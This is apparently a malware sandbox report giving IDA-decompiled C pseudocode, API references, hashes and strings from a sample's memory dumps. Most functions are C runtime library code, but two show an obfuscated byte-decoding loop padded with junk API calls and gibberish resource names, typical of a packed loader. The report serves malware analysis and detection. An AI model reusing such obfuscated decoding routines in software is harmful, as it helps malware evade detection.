Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2969281212-0
Opcode ID: 14fb988b3e8116ee7c1dec8e2f2089d2b1f26a52d6e3c3f0acf80a7b58c3899e
Instruction ID: 64425191c380e13d215e0ae420af367351f5789f6f4f79ee7076d9fa73cb4acb
Opcode Fuzzy Hash: 14fb988b3e8116ee7c1dec8e2f2089d2b1f26a52d6e3c3f0acf80a7b58c3899e
Instruction Fuzzy Hash: 2121B435204600ABE725BB66D902D4BB7E4EF85754B20803FF885762D2EE3D9C20CE5E

Uniqueness

Uniqueness Score: -1.00%

Function 00407256 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00407256() {
				signed int _v4;
				void* _v28;
				char _v40;
				char _v80;
				void* __esi;
				void* _t32;
				char* _t36;
				void* _t38;
				void* _t39;
				char* _t40;
				void* _t46;

				_push(0x44);
				E0040984C(E004B5B0F, _t32, _t38, _t39);
				E00406D7A( &_v40, _t46, "invalid string position");
				_v4 = _v4 & 0x00000000;
				E004071CF( &_v80,  &_v40);
				E00409956( &_v80, 0x4b5e90);
				asm("int3");
				_push(0x44);
				E0040984C(E004B5B32, _t32, _t38, _t39);
				E00406D7A( &_v40, _t46, "invalid string argument");
				_v4 = _v4 & 0x00000000;
				_t36 =  &_v80;
				E00407131(_t36,  &_v40);
				E00409956( &_v80, 0x4b5ef8);
				asm("int3");
				_push(_t39);
				_t40 = _t36;
				 *((intOrPtr*)(_t40 + 0x18)) = 0xf;
				E004069BD(_t36, 0);
				E00406C51(_t40, _v4, 0, 0xffffffff);
				return _t40;
			}

0x00407256
0x0040725d
0x0040726a
0x0040726f
0x0040727a
0x00407288
0x0040728d
0x0040728e
0x00407295
0x004072a2
0x004072a7
0x004072af
0x004072b2
0x004072c0
0x004072c5
0x004072cb
0x004072cc
0x004072d0
0x004072d7
0x004072e5
0x004072ee

APIs

__EH_prolog3.LIBCMT ref: 0040725D
std::bad_exception::bad_exception.LIBCMT ref: 0040727A

Part of subcall function 004071CF: std::runtime_error::runtime_error.LIBCPMT ref: 004071DA

__CxxThrowException@8.LIBCMT ref: 00407288

Part of subcall function 00409956: RaiseException.KERNEL32(?,?,00407D21,?,?,?,?,gP@,00407D21,?,004B6900,004B9A5C,000000FF,00405067,?), ref: 00409998

__EH_prolog3.LIBCMT ref: 00407295
std::bad_exception::bad_exception.LIBCMT ref: 004072B2

Part of subcall function 00407131: std::runtime_error::runtime_error.LIBCPMT ref: 0040713C

__CxxThrowException@8.LIBCMT ref: 004072C0

Strings

invalid string argument, xrefs: 0040729A
invalid string position, xrefs: 00407262

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Exception@8H_prolog3Throwstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error$ExceptionRaise
String ID: invalid string argument$invalid string position
API String ID: 1069263174-3740083952
Opcode ID: 3dbfe24cb6e2af2a38da8f002733defb18b11aabfa5826c8c807199d688b48e7
Instruction ID: 4c9af50c64a1b8f445f5b3143f2c73f98bab2fc4109a4b18431f1470697d104d
Opcode Fuzzy Hash: 3dbfe24cb6e2af2a38da8f002733defb18b11aabfa5826c8c807199d688b48e7
Instruction Fuzzy Hash: 49018072A10608A6DB00FAD1CC06FDEB77C9F10714F54013FB211765C2DBB8AA0487AD

Uniqueness

Uniqueness Score: -1.00%

Function 00408363 Relevance: 13.5, APIs: 9, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408363(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t35;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t47;
				intOrPtr _t56;

				_t45 = __esi;
				_t43 = __edi;
				_t35 = __ebx;
				 *__eax =  *__eax + __eax;
				_t18 = E00409764( *((intOrPtr*)(__eax + 0x18)));
				_t49 = _t18;
				if(_t18 != 0) {
					_push(1);
					_push( *((intOrPtr*)(E0040D8A2(__ebx, _t42, _t49) + 0x88)));
					E00408138(_t49);
				}
				_t19 = E0040D8A2(_t35, _t42, _t49);
				_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t19 + 0x88)))) - _t43;
				if( *((intOrPtr*)( *((intOrPtr*)(_t19 + 0x88)))) == _t43) {
					_t24 =  *((intOrPtr*)(E0040D8A2(_t35, _t42, _t50) + 0x88));
					_t51 =  *((intOrPtr*)(_t24 + 0x10)) - 3;
					if( *((intOrPtr*)(_t24 + 0x10)) == 3) {
						_t26 =  *((intOrPtr*)(E0040D8A2(_t35, _t42, _t51) + 0x88));
						_t52 =  *((intOrPtr*)(_t26 + 0x14)) - _t35;
						if( *((intOrPtr*)(_t26 + 0x14)) == _t35) {
							L7:
							_t55 =  *((intOrPtr*)(_t47 + 0xc));
							if( *((intOrPtr*)(_t47 + 0xc)) != 0) {
								_t28 = E0040D8A2(_t35, _t42, _t55) + 0x90;
								 *_t28 =  *_t28 - 1;
								_t56 =  *_t28;
							}
						} else {
							_t30 =  *((intOrPtr*)(E0040D8A2(_t35, _t42, _t52) + 0x88));
							_t53 =  *((intOrPtr*)(_t30 + 0x14)) - 0x19930521;
							if( *((intOrPtr*)(_t30 + 0x14)) == 0x19930521 ||  *((intOrPtr*)( *((intOrPtr*)(E0040D8A2(_t35, _t42, _t53) + 0x88)) + 0x14)) == 0x19930522) {
								goto L7;
							}
						}
					}
				}
				 *((intOrPtr*)(E0040D8A2(_t35, _t42, _t56) + 0x88)) =  *((intOrPtr*)(_t45 + 8));
				_t22 = E0040D8A2(_t35, _t42, _t56);
				 *((intOrPtr*)(_t22 + 0x8c)) =  *((intOrPtr*)(_t45 + 0xc));
				return _t22;
			}

0x00408363
0x00408363
0x00408363
0x00408363
0x00408368
0x0040836e
0x00408370
0x00408372
0x00408379
0x0040837f
0x00408385
0x00408386
0x00408391
0x00408393
0x0040839a
0x004083a0
0x004083a4
0x004083ab
0x004083b1
0x004083b4
0x004083de
0x004083de
0x004083e2
0x004083e9
0x004083ee
0x004083ee
0x004083ee
0x004083b6
0x004083bb
0x004083c1
0x004083c8
0x00000000
0x00000000
0x004083c8
0x004083b4
0x004083a4
0x004083f8
0x004083fe
0x00408407
0x00408410

APIs

Part of subcall function 00409764: __getptd.LIBCMT ref: 00409769

__getptd.LIBCMT ref: 00408374

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__getptd.LIBCMT ref: 00408386
__getptd.LIBCMT ref: 00408395
__getptd.LIBCMT ref: 004083A6
__getptd.LIBCMT ref: 004083B6
__getptd.LIBCMT ref: 004083CA
__getptd.LIBCMT ref: 004083E4
__getptd.LIBCMT ref: 004083F0
__getptd.LIBCMT ref: 004083FE

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID:
API String ID: 803148776-0
Opcode ID: e8748a779fafa9aef96f11b94b66d0070db707ac83d6ef6b22410b9239d7ae68
Instruction ID: 1ae3e90b536215f05cb87cf7c1bc25b885a9bd898bf83ccd353ff7ec638ad95f
Opcode Fuzzy Hash: e8748a779fafa9aef96f11b94b66d0070db707ac83d6ef6b22410b9239d7ae68
Instruction Fuzzy Hash: BA11B932900200DFD624BF6AD545B6577A0BF90314F4980BEE498AB6A3CF399888DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004047D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 123
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004047D0(void* _a4, intOrPtr* _a8) {
				struct _OSVERSIONINFOEXW _v284;
				struct _SMALL_RECT _v292;
				struct _SMALL_RECT _v300;
				struct _CHAR_INFO _v304;
				struct _COORD _v308;
				signed int _v309;
				signed int _v310;
				signed char _v311;
				signed int _v312;
				intOrPtr* _t32;
				intOrPtr _t33;
				void* _t34;
				signed char _t40;
				intOrPtr* _t43;
				signed char _t52;
				intOrPtr _t56;
				intOrPtr* _t59;
				intOrPtr _t73;
				short _t76;
				void* _t78;
				void* _t79;
				char* _t82;

				_t56 =  *0x53c47c;
				if(_t56 == 0xeaa) {
					_push(0);
					VerifyVersionInfoW( &_v284, 0, 0);
					_t56 =  *0x53c47c;
				}
				_t32 = _a8;
				_t76 = 0;
				_t82 = 0;
				if( *_t32 <= 0) {
					 *_a4 = _v308;
					 *_t32 = 0;
					return _t32;
				} else {
					_t73 = _v308;
					L5:
					L5:
					if(_t56 == 0x697) {
						__imp__AddVectoredExceptionHandler(0, 0);
						_t56 =  *0x53c47c;
					}
					_t33 =  *_a4;
					_t34 = _t33 + _t82;
					_v312 =  *((intOrPtr*)(_t33 + _t82));
					if(_t56 == 0x56d) {
						 *0x4bf0f8 = 0xd2045166;
						 *0x4bf0fc = 0xffffffff;
					}
					_v310 =  *((intOrPtr*)(_t34 + 1));
					if(_t56 == 0x11fa) {
						 *0x53c1dc = 0xd21b2ecc;
					}
					_t52 =  *((intOrPtr*)(_t34 + 3));
					_v309 =  *((intOrPtr*)(_t34 + 2));
					if(_t56 == 0x972) {
						FindResourceW(0, L"yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo", L"nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti");
						_t56 =  *0x53c47c;
					}
					_v312 = _v312 | (_t52 & 0x000000f0) + (_t52 & 0x000000f0) + (_t52 & 0x000000f0) + (_t52 & 0x000000f0);
					_t40 = _t52 << 4;
					 *0x53c1e8 = 0x87743b5e;
					 *0x53c1ec = 0xffffffff;
					_v311 = _t40;
					if(_t56 == 0x26c) {
						SetThreadPriorityBoost(0, 0);
						_v308.Y = 0;
						_v308.X = 0;
						ScrollConsoleScreenBufferA(0,  &_v292,  &_v300, _v308,  &_v304);
						_t40 = _v311;
					}
					 *((char*)(_t73 + _t76)) = _v312;
					_t78 = _t76 + 1;
					 *(_t73 + _t78) = _v310 | _t40 & 0x000000c0;
					_t79 = _t78 + 1;
					 *0x53c464 = 0;
					 *0x4bf100 = 0;
					 *(_t73 + _t79) = _t52 << 0x00000006 | _v309;
					 *0x53c458 = 0;
					 *0x53c45c = 0;
					_t59 = _a8;
					_t82 =  &_a4;
					_t76 = _t79 + 1;
					 *0x53c46c = 0xfb712230;
					if(_t82 <  *_t59) {
						goto L4;
					}
					 *_a4 = _t73;
					_t43 = _t59;
					 *_t43 = _t76;
					return _t43;
					goto L18;
					L4:
					_t56 =  *0x53c47c;
					goto L5;
				}
				L18:
			}

0x004047d0
0x004047e2
0x004047e4
0x004047ef
0x004047f5
0x004047f5
0x004047fb
0x00404804
0x00404806
0x0040480a
0x00404992
0x00404994
0x0040499e
0x00404810
0x00404812
0x00000000
0x00404826
0x0040482c
0x00404832
0x00404838
0x00404838
0x00404845
0x0040484a
0x0040484c
0x00404856
0x00404858
0x00404862
0x00404862
0x0040486f
0x00404879
0x0040487b
0x0040487b
0x00404888
0x0040488b
0x00404895
0x004048a3
0x004048a9
0x004048a9
0x004048b7
0x004048bd
0x004048c0
0x004048ca
0x004048d4
0x004048de
0x004048e4
0x004048ee
0x004048f8
0x0040490e
0x00404914
0x00404914
0x00404924
0x00404929
0x0040492a
0x00404934
0x00404935
0x0040493b
0x00404941
0x00404944
0x0040494a
0x00404950
0x00404957
0x0040495a
0x0040495b
0x00404967
0x00000000
0x00000000
0x00404974
0x00404977
0x0040497a
0x00404984
0x00000000
0x00404820
0x00404820
0x00000000
0x00404820
0x00000000

APIs

VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004047EF
AddVectoredExceptionHandler.KERNEL32(00000000,00000000), ref: 00404832
FindResourceW.KERNEL32(00000000,yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo,nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti), ref: 004048A3
SetThreadPriorityBoost.KERNEL32(00000000,00000000), ref: 004048E4
ScrollConsoleScreenBufferA.KERNEL32(00000000,?,?,?,?), ref: 0040490E

Strings

yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo, xrefs: 0040489C
nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti, xrefs: 00404897

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: BoostBufferConsoleExceptionFindHandlerInfoPriorityResourceScreenScrollThreadVectoredVerifyVersion
String ID: nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti$yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo
API String ID: 2767056007-3043713751
Opcode ID: c5a5d010891e45540b45f84bdfc00e788adb232b921a46c998e0041f13fc9941
Instruction ID: 47d6d24b7d8f382c5af8cde1d774c21e7a8c81ddc4bd573b4f62df94b6872ad9
Opcode Fuzzy Hash: c5a5d010891e45540b45f84bdfc00e788adb232b921a46c998e0041f13fc9941
Instruction Fuzzy Hash: 7541297510C3819FD314DF28DC50BAABFA5EB9A301F14856EE5D8A73A1C234550CDBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00404818 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404818(intOrPtr __edi, intOrPtr __esi) {
				intOrPtr _t27;
				void* _t28;
				signed char _t34;
				intOrPtr* _t37;
				signed char _t43;
				intOrPtr _t47;
				intOrPtr* _t49;
				intOrPtr _t61;
				intOrPtr _t63;
				void* _t64;
				void* _t65;
				void* _t67;
				void* _t69;

				_t63 = __esi;
				_t61 = __edi;
				do {
					_t47 =  *0x53c47c;
					if(_t47 == 0x697) {
						__imp__AddVectoredExceptionHandler(0, 0);
						_t47 =  *0x53c47c;
					}
					_t27 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x14c))));
					_t28 = _t27 + _t67;
					 *(_t69 + 0x10) =  *((intOrPtr*)(_t27 + _t67));
					if(_t47 == 0x56d) {
						 *0x4bf0f8 = 0xd2045166;
						 *0x4bf0fc = 0xffffffff;
					}
					 *(_t69 + 0x12) =  *((intOrPtr*)(_t28 + 1));
					if(_t47 == 0x11fa) {
						 *0x53c1dc = 0xd21b2ecc;
					}
					_t43 =  *((intOrPtr*)(_t28 + 3));
					 *(_t69 + 0x13) =  *((intOrPtr*)(_t28 + 2));
					if(_t47 == 0x972) {
						FindResourceW(0, L"yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo", L"nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti");
						_t47 =  *0x53c47c;
					}
					 *(_t69 + 0x10) =  *(_t69 + 0x10) | (_t43 & 0x000000f0) + (_t43 & 0x000000f0) + (_t43 & 0x000000f0) + (_t43 & 0x000000f0);
					_t34 = _t43 << 4;
					 *0x53c1e8 = 0x87743b5e;
					 *0x53c1ec = 0xffffffff;
					 *(_t69 + 0x11) = _t34;
					if(_t47 == 0x26c) {
						SetThreadPriorityBoost(0, 0);
						 *((short*)(_t69 + 0x16)) = 0;
						 *(_t69 + 0x18) = 0;
						ScrollConsoleScreenBufferA(0, _t69 + 0x30, _t69 + 0x24,  *(_t69 + 0x18), _t69 + 0x18);
						_t34 =  *(_t69 + 0x11);
					}
					 *((char*)(_t61 + _t63)) =  *(_t69 + 0x10);
					_t64 = _t63 + 1;
					 *(_t61 + _t64) =  *(_t69 + 0x12) | _t34 & 0x000000c0;
					_t65 = _t64 + 1;
					 *0x53c464 = 0;
					 *0x4bf100 = 0;
					 *(_t61 + _t65) = _t43 << 0x00000006 |  *(_t69 + 0x13);
					 *0x53c458 = 0;
					 *0x53c45c = 0;
					_t49 =  *((intOrPtr*)(_t69 + 0x150));
					_t67 = _t67 + 4;
					_t63 = _t65 + 1;
					 *0x53c46c = 0xfb712230;
				} while (_t67 <  *_t49);
				 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x14c)))) = _t61;
				_t37 = _t49;
				 *_t37 = _t63;
				return _t37;
			}

0x00404818
0x00404818
0x00404820
0x00404820
0x0040482c
0x00404832
0x00404838
0x00404838
0x00404845
0x0040484a
0x0040484c
0x00404856
0x00404858
0x00404862
0x00404862
0x0040486f
0x00404879
0x0040487b
0x0040487b
0x00404888
0x0040488b
0x00404895
0x004048a3
0x004048a9
0x004048a9
0x004048b7
0x004048bd
0x004048c0
0x004048ca
0x004048d4
0x004048de
0x004048e4
0x004048ee
0x004048f8
0x0040490e
0x00404914
0x00404914
0x00404924
0x00404929
0x0040492a
0x00404934
0x00404935
0x0040493b
0x00404941
0x00404944
0x0040494a
0x00404950
0x00404957
0x0040495a
0x0040495b
0x00404965
0x00404974
0x00404977
0x0040497a
0x00404984

APIs

AddVectoredExceptionHandler.KERNEL32(00000000,00000000), ref: 00404832
FindResourceW.KERNEL32(00000000,yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo,nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti), ref: 004048A3
SetThreadPriorityBoost.KERNEL32(00000000,00000000), ref: 004048E4
ScrollConsoleScreenBufferA.KERNEL32(00000000,?,?,?,?), ref: 0040490E

Strings

yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo, xrefs: 0040489C
nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti, xrefs: 00404897

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: BoostBufferConsoleExceptionFindHandlerPriorityResourceScreenScrollThreadVectored
String ID: nageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti$yidecekanenazageforogedozuvufe ton dosagizowezavadukepesuwamo
API String ID: 3162740389-3043713751
Opcode ID: 35b64377edfca4205a267d82cec28f37f4400c04da81f4a1ec3c02ad59cf2544
Instruction ID: 21259e97db768c926eaea5a4fbf23e31460aa057bec0f05f67bb7f79d3b18e3d
Opcode Fuzzy Hash: 35b64377edfca4205a267d82cec28f37f4400c04da81f4a1ec3c02ad59cf2544
Instruction Fuzzy Hash: 2941157514C3C18FD304DF28DC60BAABFA1EBA6301F14896EE5D9973A2C234410DDB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041C841 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 54%

			E0041C841(intOrPtr* _a4) {
				signed int _v8;
				char _v12;
				char _v20;
				intOrPtr _t12;
				void* _t15;
				intOrPtr* _t21;
				void* _t22;

				_t12 =  *((intOrPtr*)( *0x4ba41c));
				if(_t12 == 0) {
					_push(0x29);
					_push(_a4);
					_t15 = E0041C024(E0041BE23( &_v12, " throw("),  &_v20, 1);
					goto L5;
				} else {
					if(_t12 != 0x5a) {
						_push(0x29);
						_push(_a4);
						_t15 = E0041C4D3(_t22,  &_v20, " throw(", E0041C765(_t22,  &_v12));
						L5:
						E0041C4F7(_t15);
						return _a4;
					} else {
						 *0x4ba41c =  *0x4ba41c + 1;
						_t21 = _a4;
						 *_t21 = 0;
						 *(_t21 + 4) = _v8 & 0xffff0000;
						return _t21;
					}
				}
			}

0x0041c84b
0x0041c852
0x0041c895
0x0041c897
0x0041c8af
0x00000000
0x0041c854
0x0041c856
0x0041c873
0x0041c875
0x0041c88b
0x0041c8b4
0x0041c8b6
0x0041c8bf
0x0041c858
0x0041c858
0x0041c861
0x0041c86c
0x0041c86e
0x0041c872
0x0041c872
0x0041c856

APIs

UnDecorator::getArgumentTypes.LIBCMT ref: 0041C87C
operator+.LIBCMT ref: 0041C88B
DName::DName.LIBCMT ref: 0041C8A8
DName::operator+.LIBCMT ref: 0041C8AF
DName::operator+.LIBCMT ref: 0041C8B6

Strings

throw(, xrefs: 0041C885, 0041C8A0

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: Name::operator+$ArgumentDecorator::getNameName::Typesoperator+
String ID: throw(
API String ID: 4203687869-3159766648
Opcode ID: bdc7a6c940c192e4e902feefde91570f8a144fa745f34fc9e582de73c64bfd1b
Instruction ID: a5f2871189069fddb1c3585f140d4688f61df679285df3930c5430ffee9cabc9
Opcode Fuzzy Hash: bdc7a6c940c192e4e902feefde91570f8a144fa745f34fc9e582de73c64bfd1b
Instruction Fuzzy Hash: E801D870640208BFDF10EFA8DC96EEE3FB5EB44708F004467B901AB391D678D5458798

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA7 Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00409EA7() {
				intOrPtr* _t24;
				void* _t27;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_push(0xc);
				_push(0x4b6220);
				E0040E1B4(_t27, _t34, _t36);
				_t35 = E0040D8A2(_t27, _t33, _t39);
				_t37 = E0040DC72(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				if(_t37 != 0) {
					E00409CA7(_t27, _t35, _t37, __eflags);
					E004143CB(_t27, _t33, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E00410EE5(_t27, _t35, 0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E00409B1B( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E00409F41();
					E00410EE5(_t27, _t35, 0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E00409F4D();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E0040BCDC())) = 0xc;
					_t24 = 0;
				}
				return E0040E1F9(_t24);
			}

0x00409ea7
0x00409ea9
0x00409eae
0x00409eb8
0x00409ec5
0x00409ec7
0x00409ecc
0x00409edd
0x00409ee2
0x00409eea
0x00409eef
0x00409ef4
0x00409efa
0x00409efa
0x00409efa
0x00409f00
0x00409f06
0x00409f0d
0x00409f14
0x00409f1a
0x00409f24
0x00409f2a
0x00409f31
0x00409f36
0x00409ece
0x00409ed3
0x00409ed9
0x00409ed9
0x00409f3d

APIs

__getptd.LIBCMT ref: 00409EB3

Part of subcall function 0040D8A2: __getptd_noexit.LIBCMT ref: 0040D8A5
Part of subcall function 0040D8A2: __amsg_exit.LIBCMT ref: 0040D8B2

__calloc_crt.LIBCMT ref: 00409EBE

Part of subcall function 0040DC72: __calloc_impl.LIBCMT ref: 0040DC83
Part of subcall function 0040DC72: Sleep.KERNEL32(00000000), ref: 0040DC9A

__lock.LIBCMT ref: 00409EF4
___addlocaleref.LIBCMT ref: 00409F00
__lock.LIBCMT ref: 00409F14
InterlockedIncrement.KERNEL32(?), ref: 00409F24

Part of subcall function 0040BCDC: __getptd_noexit.LIBCMT ref: 0040BCDC

Memory Dump Source

Source File: 00000005.00000002.440687279.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.440678755.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440782268.00000000004B8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.440793412.0000000000544000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_759F.jbxd

Similarity

API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__getptd
String ID:
API String ID: 3538106438-0
Opcode ID: 44a5d4548b3c91bc25d593e1d0ce1b39eb21733be39e88b39c0af66a655f8a63
Instruction ID: 74ec4c42d94f5983fb8e1a3bdb3cefcb5c37099638806108ef45fecb0a44c055
Opcode Fuzzy Hash: 44a5d4548b3c91bc25d593e1d0ce1b39eb21733be39e88b39c0af66a655f8a63
Instruction Fuzzy Hash: F401B132A04301EAE720BBA69802B4D77A0AF40728F20456FF454BB2C2CB7C4C81875D

Uniqueness

Uniqueness Score: -1.00%

Function 00405CD0 Relevance: 7.6, APIs: 5, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00405CD0(void* __ebx, signed int _a4) {
				char _v12;
				signed int _v16;
				void* _v20;
				char _v28;
				void* _v32;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t38;
				signed int* _t48;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				signed int _t61;
				signed int* _t63;
				intOrPtr* _t78;
				intOrPtr* _t81;
				void* _t83;
				intOrPtr _t84;
				void* _t87;

				_t61 = _a4;
				_t84 = _t83 - 0xc;
				if(_t61 > 0) {
					_t38 = _t37 | 0xffffffff;
					__eflags = _t38 / _t61 - 1;
					if(_t38 / _t61 >= 1) {
						goto L2;
					} else {
						_a4 = 0;
						E004074F4( &_v12,  &_a4);
						_t63 =  &_v16;
						_v16 = 0x4012c4;
						E00409956(_t63, 0x4b6900);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xffffffff);
						_push(E004B5B9B);
						_push( *[fs:0x0]);
						 *[fs:0x0] = _t84;
						_push(_t63);
						_t81 =  *((intOrPtr*)(_t84 + 0x18));
						 *_t81 = 0x403f6c;
						E00406596(_t81 + 4);
						_push(4);
						_v16 = 0;
						_t78 = E00407CBD();
						_t87 = _t84 + 4;
						__eflags = _t78;
						if(__eflags == 0) {
							_t78 = 0;
							__eflags = 0;
						} else {
							_push(__ebx);
							 *_t78 = E00406E53(__ebx, _t78, _t81, __eflags);
							_t59 = E00406796();
							E004064D7( &_v28, 0);
							_t55 =  *((intOrPtr*)(_t59 + 4));
							__eflags = _t55 - 0xffffffff;
							if(_t55 < 0xffffffff) {
								_t57 = _t55 + 1;
								__eflags = _t57;
								 *((intOrPtr*)(_t59 + 4)) = _t57;
							}
							E004064FF( &_v28);
						}
						 *((intOrPtr*)(_t81 + 0x38)) = _t78;
						 *(_t81 + 0x10) = _t81 + 8;
						 *(_t81 + 0x20) = _t81 + 0x18;
						 *(_t81 + 0x24) = _t81 + 0x1c;
						_t48 = _t81 + 0xc;
						 *(_t81 + 0x14) = _t48;
						 *(_t81 + 0x30) = _t81 + 0x28;
						 *(_t81 + 0x34) = _t81 + 0x2c;
						 *_t48 = 0;
						 *( *(_t81 + 0x24)) = 0;
						 *( *(_t81 + 0x34)) = 0;
						 *( *(_t81 + 0x10)) = 0;
						 *( *(_t81 + 0x20)) = 0;
						 *( *(_t81 + 0x30)) = 0;
						 *[fs:0x0] =  *((intOrPtr*)(_t87 + 0xc));
						return _t81;
					}
				} else {
					_t61 = 0;
					L2:
					_push(_t61);
					return E00407CBD();
				}
			}

0x00405cd0
0x00405cd4
0x00405cd9
0x00405cec
0x00405cf3
0x00405cf6
0x00000000
0x00405cf8
0x00405d01
0x00405d09
